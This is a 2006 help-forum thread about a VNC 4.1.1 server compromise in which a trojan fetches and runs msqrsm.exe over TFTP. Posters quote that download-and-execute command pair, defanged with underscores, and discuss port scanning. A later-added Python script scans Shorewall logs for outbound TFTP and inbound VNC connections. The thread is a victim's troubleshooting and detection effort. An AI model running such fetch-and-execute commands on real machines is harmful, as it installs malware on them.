Author Topic: DOS (tftp) virus  (Read 26495 times)


cylosine

  • Guest
Re: DOS (tftp) virus
« Reply #30 on: October 01, 2006, 09:30:19 AM »
Hi leiw,
May you find inspiration and help in the forum.

1.. Version 4.1.1 you cannot get rid of fast enough, especially now that you have seen that somebody knows, perhaps accidentally, that your servers exist.

Upgrading to 4.1.2 gets you over the initial flaw, but if you are using the free version I would suggest you review this for use over the internet. Reading the small print/manual or specs closer, this is not recommended when you cross the internet jungle, as the password encryption is not strong. The normal session information, I understand, is just open to anybody with no encryption.

I forgot this and happily used it for 12 months until it went bad. If your company information is important you should consider the 'bigger' versions, which have much better encryption and encryption on the session transmissions. Convince yourself you understand all this, because I am not an expert; I just have some reasonable understanding about various aspects of computing.

Consider moving away from using the default port of 5900; perhaps that may give you some protection. "Everybody" knows that port and will almost by default have this in their software. It just makes it a little bit harder for unwanted sniffing.

I am deliberately using the underscore in the next lines.

tftp -i 0.0.0.0 GET msqrsm_exe

msqrsm_exe

My understanding is the first line downloads the dirty file to IP address 0.0.0.0, where I am not sure of the importance of 0.0.0.0; I had expected your public IP address here, which could be a very good thing.

The second line executes msqrsm_exe. If it had been downloaded to your machines or network, you must go looking for how to get rid of what it has downloaded.

The only place I have seen help is PREVX1; I am still trying to find out more. Actually I have put our machine on a sort of hold, as I have run out of energy to focus on just this bastard.

Like you I have still no idea how our machine got activated. Because we used vnc 4.1.1 I am assuming that somehow an accidental portscan revealed our existence on the net despite running in stealth mode behind a software firewall. Unfortunately the NAT router was not installed on the cable modem. We did not have that extra protection, which you seem to have as you are on a 192.168.1.x network.

Do you have a software firewall as well as NAT? I may be a little bit out on deep water, as you talked about servers and I talk about hosts. You may be better protected.

Do you have the facility to log all incoming and outgoing traffic? If so, this should reveal a lot about what msqrsm_exe.

Where it came from? No idea

Good luck and I hope it did not run.

C.

leiw

  • Guest
Re: DOS (tftp) virus
« Reply #31 on: October 01, 2006, 11:02:45 AM »
To Cylosine:

   Thanks for your reply. I will go back to the company to upgrade VNC to version 4.1.2. One question: after VNC is upgraded, will the auto command disappear? Or do I need to use PREVX1 to clear all the dirty files? But I think maybe it cannot clear all the dirty files, because I tried it.

I am using Shorewall, which is a free Linux firewall that includes NAT, packet filtering etc. For now I have dropped all outgoing traffic as a precaution. I will post the firewall log when I go back to the company.
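cylosine asked whether all incoming and outgoing traffic can be logged, and leiw is running Shorewall. Below is an added example of what such a log could be checked for; it is my own code, not anything posted in this thread and not part of Shorewall or VNC. It assumes Shorewall's default netfilter log format (a `Shorewall:chain:action:` prefix followed by `SRC=`/`DST=`/`PROTO=`/`DPT=` fields) and runs over constructed sample lines with made-up addresses. It flags outbound UDP to port 69 from internal hosts (the `tftp -i ... GET` transfer discussed above) and inbound TCP to 5900 from non-RFC 1918 addresses, then lists the internal hosts that attempted TFTP so they can be checked for msqrsm_exe.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample lines in the netfilter/syslog style that Shorewall logs
# through the kernel; chain names and addresses are made up for this example.
SAMPLE_LOG = """\
Oct  1 09:12:03 gw kernel: Shorewall:net2fw:DROP:IN=eth0 OUT= SRC=203.0.113.45 DST=198.51.100.7 PROTO=TCP SPT=51234 DPT=5900
Oct  1 09:12:09 gw kernel: Shorewall:loc2net:DROP:IN=eth1 OUT=eth0 SRC=192.168.1.10 DST=203.0.113.45 PROTO=UDP SPT=1045 DPT=69
Oct  1 09:12:10 gw kernel: Shorewall:loc2net:ACCEPT:IN=eth1 OUT=eth0 SRC=192.168.1.22 DST=198.51.100.200 PROTO=TCP SPT=3321 DPT=80
Oct  1 09:13:40 gw kernel: Shorewall:loc2net:DROP:IN=eth1 OUT=eth0 SRC=192.168.1.10 DST=203.0.113.45 PROTO=UDP SPT=1046 DPT=69
Oct  1 09:14:02 gw kernel: Shorewall:net2fw:DROP:IN=eth0 OUT= SRC=192.168.1.10 DST=198.51.100.7 PROTO=TCP SPT=1050 DPT=5900
"""

# "Shorewall:<chain>:<action>:" then the netfilter key=value fields.
HEADER_RE = re.compile(r"Shorewall:([^:]+):([A-Z]+):(.*)$")
KV_RE = re.compile(r"(\w+)=(\S*)")
RFC1918 = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
TFTP_PORT, VNC_PORT = 69, 5900


def is_internal(addr):
    """RFC 1918 check done explicitly: Python's is_private also covers
    documentation ranges such as 203.0.113.0/24, which we want treated as external."""
    ip = ip_address(addr)
    return any(ip in net for net in RFC1918)


def parse_line(line):
    """Return the netfilter fields plus chain/action, or None for non-Shorewall lines."""
    m = HEADER_RE.search(line)
    if not m:
        return None
    fields = dict(KV_RE.findall(m.group(3)))   # empty values (OUT=) are kept as ""
    fields["chain"], fields["action"] = m.group(1), m.group(2)
    return fields


def classify(fields):
    """Return (kind, src, dst, action) for traffic worth a look, else None."""
    proto, dpt, src, dst = (fields.get(k) for k in ("PROTO", "DPT", "SRC", "DST"))
    if not (dpt and src and dst):
        return None
    port = int(dpt)
    # Internal host pulling a file over TFTP: the download step in the command above.
    if proto == "UDP" and port == TFTP_PORT and is_internal(src):
        return ("tftp", src, dst, fields["action"])
    # Outside address knocking on the VNC port; internal VNC clients are ignored.
    if proto == "TCP" and port == VNC_PORT and not is_internal(src):
        return ("vnc", src, dst, fields["action"])
    return None


def scan_log(text):
    """Run every line through the parser and keep the findings in log order."""
    findings = []
    for line in text.splitlines():
        fields = parse_line(line)
        if fields:
            hit = classify(fields)
            if hit:
                findings.append(hit)
    return findings


def tftp_sources(text):
    """Internal hosts that attempted TFTP: the machines to inspect for the dropped file."""
    return sorted({src for kind, src, _, _ in scan_log(text) if kind == "tftp"})


if __name__ == "__main__":
    for kind, src, dst, action in scan_log(SAMPLE_LOG):
        print(f"{kind:4} {src:>15} -> {dst:<15} {action}")
    print("hosts to inspect for msqrsm_exe:", ", ".join(tftp_sources(SAMPLE_LOG)))
```

Feed it the real log with `scan_log(open("/var/log/messages").read())`; because leiw is currently dropping all outgoing traffic, any internal host that still shows up under `tftp` is one where something keeps trying to fetch the file and needs cleaning rather than just a firewall rule.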


cylosine

  • Guest
Re: DOS (tftp) virus
« Reply #32 on: October 01, 2006, 02:58:22 PM »
Hi leiw

1.. The command windows may disappear, if they are coming from the outside.
2.. If you have any trace of malware still around, try PREVX1, I have still not found any other mention on the net. But I am not looking at the moment.
C.

mauserme

  • Guest
Re: DOS (tftp) virus
« Reply #33 on: October 01, 2006, 07:58:35 PM »
My understanding is the first line downloads the dirty file to IP address 0.0.0.0, where I am not sure of the importance of 0.0.0.0; I had expected your public IP address here, which could be a very good thing.
I believe 0.0.0.0 designates "default route" in this case.  This way an outbound connection can be established without knowing the address for the gateway and may hide the underlying process to some degree.


Like you I have still no idea how our machine got activated.  Because we used vnc 4.1.1 I am assuming that somehow an accidental portscan revealed our existence on the net despite running in stealth mode behind a software firewall.

Certainly port 5900 is open during an active session but keep in mind that the GRC site doesn't scan that high (it only goes as high as port 1055 for the Scan All Service Ports test and includes port 5000 (but nothing higher) for the Common Ports test).  If you want to test this further you could try the scanning tools at PC Flank which has an option to specify a port under the Advanced Port Scanner tab

http://www.pcflank.com/scanner1s.htm

or a program like Nmap (use cautiously lest you get booted by your ISP).

From this point of view it could be a random scan but maybe more likely an attacker targeting the vulnerability.

1.. The command windows may disappear, if they are coming from the outside.
2.. If you have any trace of malware still around, try PREVX1, I have still not found any other mention on the net. But

I'm guessing #1 will be the case if your server is being cracked during an active session, but you might still need to remove malware (so far I haven't seen any indication that it's originating on the client).

#2 is a definite if the problem originates on the server in the form of something like a trojan downloader.

The answer to which of these is the case may be in when the problems occur - only during an active session or randomly when the server is idling.  Does anyone have information on this?

cylosine

  • Guest
Re: DOS (tftp) virus
« Reply #34 on: October 02, 2006, 06:55:38 AM »
Hi mauserme,

About 0.0.0.0 I was hoping this was not the case, wonder what happened.

GRC test: thanks for pointing out that the scan is limited to the 'service' group. I forgot that higher up one must be more specific; the largest range scan is 64 ports at a time. A scan of 5900-5963 only revealed that 5900 is known as the vnc entry.

General: I have just done a search on the internet for the following files, and listed which virus labs seem to have some info:

msinexecs.exe  - prevx
msqrsm.exe     - prevx
winlolx.exe    - prevx, Sophos?
louvz.exe      - nothing mentioned

Has anybody else seen better information on these?